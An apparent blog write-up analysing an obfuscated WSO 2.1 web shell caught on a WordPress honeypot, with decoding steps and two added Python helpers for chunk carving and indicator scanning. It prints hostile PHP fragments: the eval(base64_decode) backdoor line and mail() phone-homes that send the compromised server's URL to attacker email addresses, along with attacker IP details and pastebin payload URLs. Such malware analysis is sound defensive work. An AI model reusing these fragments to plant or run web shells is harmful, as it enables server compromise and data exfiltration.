2018-03-08
Obfuscated WSO version 2.1, an old favorite, this time with a little bit more complicated encoding than is common. The web shell itself is completely kinked, containing two phone-homes, and doing two downloads from pastebin.com, one of which is an email tool, the other is WSO 2.6 web shell.
This is complicated. It contains layers of malware.
58.44.44.33 has no DNS name.
58.44.44.33 belongs to Hunan Telecom, in Yueyang, Hunan.
inetnum: 58.44.0.0 - 58.44.127.255
netname: CHINANET-HN-YY
country: CN
descr: CHINANET-HN Yueyang node network
descr: hunan Telecom
admin-c: CHY4-AP
tech-c: CH636-AP
status: ALLOCATED NON-PORTABLE
mnt-by: MAINT-CHINANET-HN
mnt-lower: MAINT-CHINANET-HN-YY
last-modified: 2008-09-04T07:03:41Z
role: CHINANET HuNan Yueyang
address: Dongmaoling telecom building,Yueyang,Hunanan 414000
country: CN
phone: +86 730 8235976
fax-no: +86 730 8235976
e-mail: abuse.yy@2118.com.cn
The HTTP requests set PHP's HTTP_ACCEPT_LANGUAGE server variable to zh-cn, which makes sense with respect to the IP address' physical location.
p0f3 says 58.44.44.33 runs "Windows 7 or 8":
[2018/03/08 02:07:50] mod=syn|cli=58.44.44.33/9326|srv=162.246.45.144/80|subj=cli|os=Windows 7 or 8|dist=13|params=none|raw_sig=4:115+13:0:1200:8192,2:mss,nop,ws,nop,nop,sok:df,id+:0
The User Agent string of "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)" seems to confirm that.
Downloaded to the same 404.php backdoor as this recon malware, except it used more POST parameters. This is a facet of the backdoor just doing a PHP eval() on the value of a specific POST parameter, "@123". The attacker sent a string in "@123" that used POST parameters named "z0", "z1" and "z2".
There are multiple threads of decoding, because of the multiply-compromised code. We start with only one file, but end up with many.
1. Hand edit 58.44.44.33WqEH5ybsZB6qzsq9tL9VmwAAAAE.wso.scans into files z0, z1, z2
2. Get z0 decoded.
   - Hand edit z0 to leave only Base64-encoded text
   - Invoke base64 -d z0 > z0.1
   - Add "<?php" to z0.1, pretty-print to get z0.2.
3. Get z1 decoded.
   - Hand edit z1 to leave only Base64-encoded text
   - Invoke base64 -d z1 > z1.1
   - File z1.1 has a string in it: "SCRIPT_FILENAMEZ::/wew.php".
4. Get z2 decoded.
   - Hand-edit z0.2, using z1.1 and z2 contents, into dc1.php
   - Invoke php dc1.php, which decodes the string from z2 into file wew.php
5. Pretty-print wew.php into wew for readability.
6. Decode obfuscated phone home (second phone home)
   - Extract lines 91, 92 from wew into shell_data
   - Hand-edit shell_data so that it prints instead of evals.
   - Invoke php shell_data > sd1.php
   - Hand-edit sd1.php to add "<?php"
   - Pretty-print sd1.php yielding sd2.php
Relies on ancient 404.php to evaluate code in POST parameter named "@123":
@eval(base64_decode($_POST[z0]));
POST parameter "z0" ends up being a "dropper" that uses value of POST parameter "z1" as a file name, and value of POST parameter "z2" as the contents of that file name.
POST parameter z1 decoded to: SCRIPT_FILENAMEZ::/wew.php, which seems wrong for both Linux and Windows machines. A directory SCRIPT_FILENAMEZ:: would have to exist first, before file_put_contents() would function correctly. I don't think Windows file names can have ':' or '/' characters in them. I suspect this would cause the file_put_contents() call to fail miserably.
PHP code in POST parameter "z0" uses a second form of encoding for the contents of POST parameter "z1": 2-character representations of the hexadecimal values of the ASCII bytes. The decoding inserts a '%' character before every two characters of the encoded contents, then runs PHP's urldecode() builtin over the resulting "%xx" style hex representations.
File wew.php is the final form of the code, I believe.
Had the attacker actually executed the dropper code (dc1.php), it would end up sending back a string like "->|1|<-" to the downloader. If everything worked correctly. And it probably wouldn't.
I'm sorry this is complicated.
wew.php really is WSO 2.1, plus a phone home to wildt00lz@gmail.com, plus download of two files from pastebin.com, wmw.php and 2ww.php, plus a second phone home to d0z_a@yahoo.com.
Holy cow, wew.php is totally kinked.
The phone-homes get executed every time wew.php runs, as do a few lines of code that modify php.ini to have Safe Mode off, and to eliminate any disabled functions.
Additionally, wew.php sets a cookie that never gets referenced elsewhere:
@setcookie("wsog","orb",time()+3600*24*7);
Perhaps there's some other malware, when installed on the same web site as wew.php, that uses this cookie.
Overall, wew.php exhibits WSO's characteristic organization into "action" functions, with dispatch to an action done with PHP's call_user_func() based on the value of a POST parameter named "a".
This phone home was just blatantly shoved in to the WSO 2.1 code. No de-obfuscating necessary.
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);
$body = "Shell: http://" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'] . " " . "Directory" . dirname(__FILE__);
mail('wildt00lz@hotmail.com', $_SERVER['SERVER_ADDR'], $body);
The email sent to wildt00lz@hotmail.com and wildt00lz@gmail.com would have the IP address of the compromised web server as its "Subject:" line, and the body would have a URL for the original back door, and the directory in which the kinked WSO 2.1 file wew.php ended up, something like:
Shell: http://www.stratigery.com/wp-content/themes/twentytwelve/404.php /var/www/html/wp-content/themes/twentytwelve
This would probably let the attacker guess at a URL for access to wew.php.
wmw.php - from https://pastebin.com/raw/YDMtmcAr
Appears to be a stock LeafMailer, has comments but not the phone-home from an earlier LeafMailer.
2ww.php - from https://pastebin.com/raw/GUcxfLzm
The source code in 2ww.php needs some cleanup to enhance readability.
- Run de-obfuscator over 2ww.php yielding 2ww.f1.php
- Hand edit 2ww.f1.php: remove the eval(' and '); and un-escape the remaining single-quotes.
- Run de-obfuscator over 2ww.f1.php to get 2ww.f2.php
I've seen some obfuscation like this before. The file 2ww.php contains obfuscated PHP, followed by a string of encoded text. Using fopen() on itself via the __FILE__ feature of PHP, the obfuscated PHP reads some of the string of encoded text, decodes it, and evals it. Deobfuscating the mix of code and encoded code in 2ww.f2.php is iterative: figure out how far the file pointer from fopen() is in 2ww.php (initially, the fread() sets it to 0x50D = 1293), determine how much of the encoded data to put into the decoding function (first chunk, 0x1A8 = 424 bytes), and how far that fread() advances the file pointer.
x3.php is the final decoder. It was easier to massage a copy of 2ww.f2.php (x3.php) by doing throwaway intermediate PHP programs from pieces of 2ww.php, then incorporate the knowledge gained into x3.php.
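To keep that file-pointer bookkeeping straight, here is an added Python helper (mine, not part of the original write-up or of the sample) that replays PHP-style fopen()/fseek()/fread() pointer movement over an in-memory copy of a file, so each chunk boundary is computed rather than estimated. The file image is constructed: a stand-in stub padded out to the 0x50D offset quoted above, a 0x1A8-byte first chunk, and a shorter second chunk; the decoding function the sample applies to each chunk is not reproduced, only the carving.

```python
"""Replay PHP fopen()/fseek()/fread() pointer arithmetic over a file image so
the chunk offsets of a self-reading loader can be recorded exactly.
Added example; not the post's code and not the malware's."""


class PhpFileCursor:
    """Minimal emulation of a PHP file handle over an in-memory byte string.
    fread(n) returns at most n bytes and advances the pointer, as PHP's does."""

    def __init__(self, data: bytes):
        self.data = data
        self.pos = 0

    def fseek(self, offset: int) -> int:
        if offset < 0 or offset > len(self.data):
            raise ValueError("seek outside the file image")
        self.pos = offset
        return self.pos

    def fread(self, length: int) -> bytes:
        chunk = self.data[self.pos:self.pos + length]
        self.pos += len(chunk)  # short read at EOF, like PHP
        return chunk

    def ftell(self) -> int:
        return self.pos


def carve_chunks(data: bytes, first_offset: int, sizes: list[int]) -> list[tuple[int, bytes]]:
    """Read consecutive chunks starting at first_offset and return
    (start offset, chunk) pairs so every fread()'s starting position is on record."""
    cur = PhpFileCursor(data)
    cur.fseek(first_offset)
    out = []
    for size in sizes:
        out.append((cur.ftell(), cur.fread(size)))
    return out


# Constructed file image (not the real 2ww.php): a stand-in stub padded to the
# 0x50D byte offset reported above, a 0x1A8-byte first encoded chunk of 'A's,
# and a 100-byte second chunk of 'B's.
STUB_LEN, FIRST_CHUNK = 0x50D, 0x1A8
FILE_IMAGE = (b"<?php /* self-reading stub */ ".ljust(STUB_LEN, b" ")
              + b"A" * FIRST_CHUNK + b"B" * 100)


def chunk_table(data: bytes = FILE_IMAGE) -> list[tuple[int, int, int]]:
    """(start, bytes actually read, pointer afterwards) for three successive
    fread() calls; the third one runs into EOF and comes back empty."""
    return [(start, len(chunk), start + len(chunk))
            for start, chunk in carve_chunks(data, STUB_LEN, [FIRST_CHUNK, 100, 50])]


if __name__ == "__main__":
    for start, length, after in chunk_table():
        print(f"fread at 0x{start:X} returned {length} bytes, pointer now 0x{after:X}")
```

Feeding the real stub's seek and read sizes into carve_chunks() gives the exact byte ranges to paste into the decoding routine at each iteration, and the empty third read shows where the encoded tail runs out.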
Deobfuscated form of 2ww.php is wso2.6.php.
Ironically, most WSO 2.6 files out in the wild have the same phone-home as the "second phone home" in the WSO 2.1 wew.php file. 2ww.php has had it removed.
The second phone home, from Decoding Step 6 above, ends up looking like this:
<?php
$visitcount = $HTTP_COOKIE_VARS["visits"];
if ($visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target = rawurldecode($web . $inj);
$body = "Boss, there was an injected target on {$target} by {$visitor}";
@mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");
} else {
$visitcount;
}
setcookie("visits", $visitcount);
The first time a browser (the code uses HTTP cookies) accesses the kinked WSO wew.php, the compromised server (the host running my WordPress honey pot) sends an email to "d0z_a@yahoo.com" with the URL of wew.php and the IP address of the browser. What a gold mine of info. Oddly, the email will claim that WSO 2.1 is a Fx29Shell web shell. I think this phone home code originates in Fx29Shell. Either the original author of Fx29 put it in, or someone put it in a widely copied version of Fx29. I've seen this phone home in other versions of WSO.
See my malware-phylogeny project for some additional detail.
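From the defender's side, the traits described in this post are all greppable: hardcoded-recipient mail() phone-homes, the eval(base64_decode(...)) dropper, WSO's call_user_func() dispatch on request data, and the Safe Mode / disable_functions tampering. The following Python scanner is an added example (mine, not from the original post): it runs those indicator patterns over PHP source and pulls the literal mail() recipients out as indicators of compromise. The sample source is constructed from lines quoted in this post plus two stand-in lines, a call_user_func() dispatch in the shape WSO uses and a php.ini write approximating the Safe Mode edit described above; neither is the sample's actual code.

```python
"""Heuristic scanner for the webshell traits discussed in the write-up.
Added example; not the post's code and not the malware's."""
import re

# (label, pattern) pairs; each is a coarse indicator, not proof by itself.
INDICATORS = [
    ("hardcoded-recipient mail()",
     re.compile(r"\bmail\s*\(\s*['\"][^'\"]+@[^'\"]+['\"]")),
    ("eval of base64_decode()",
     re.compile(r"\beval\s*\(\s*base64_decode\s*\(")),
    ("call_user_func() fed from request data",
     re.compile(r"\bcall_user_func\s*\([^;]*\$_(?:POST|GET|REQUEST|COOKIE)\b")),
    ("safe_mode / disable_functions tampering",
     re.compile(r"safe_mode|disable_functions")),
]
RECIPIENT = re.compile(r"\bmail\s*\(\s*['\"]([^'\"]+@[^'\"]+)['\"]")

# Constructed sample: lines quoted in the write-up plus two stand-in lines
# (the call_user_func() dispatch and the php.ini write are approximations).
SAMPLE_PHP = "\n".join([
    "<?php",
    '$visitcount = $HTTP_COOKIE_VARS["visits"];',
    "$body = \"Shell: http://\" . $_SERVER['SERVER_NAME'] . $_SERVER['REQUEST_URI'];",
    "mail('wildt00lz@gmail.com', $_SERVER['SERVER_ADDR'], $body);",
    '@mail("d0z_a@yahoo.com", "Fx29Shell http://{$target} by {$visitor}", "{$body}");',
    "@eval(base64_decode($_POST[z0]));",
    "if(function_exists('action'.$_POST['a'])) call_user_func('action'.$_POST['a']);",
    "file_put_contents('php.ini', 'safe_mode = Off');",
    '@setcookie("wsog","orb",time()+3600*24*7);',
    "mail($to, $subject, $message);",  # recipient is a variable: not flagged
])


def scan_php(source: str) -> list[tuple[int, str]]:
    """Return (line number, indicator label) pairs, one per indicator that
    matches a line; a line can produce several."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), 1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


def mail_recipients(source: str) -> list[str]:
    """Literal recipient addresses used in mail() calls, in order, deduplicated."""
    seen = []
    for addr in RECIPIENT.findall(source):
        if addr not in seen:
            seen.append(addr)
    return seen


if __name__ == "__main__":
    for lineno, label in scan_php(SAMPLE_PHP):
        print(f"line {lineno}: {label}")
    print("phone-home recipients:", mail_recipients(SAMPLE_PHP))
```

The mail() pattern deliberately requires a quoted literal as the first argument, so an ordinary mailer that takes its recipient from a variable is not flagged; the extracted addresses are what you would feed into mail-log searches to find out whether the phone-home ever fired.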
Nothing turned up when I googled for "wildt00lz@gmail.com", or "d0z_a@yahoo.com". The addresses seem to have stayed off radar.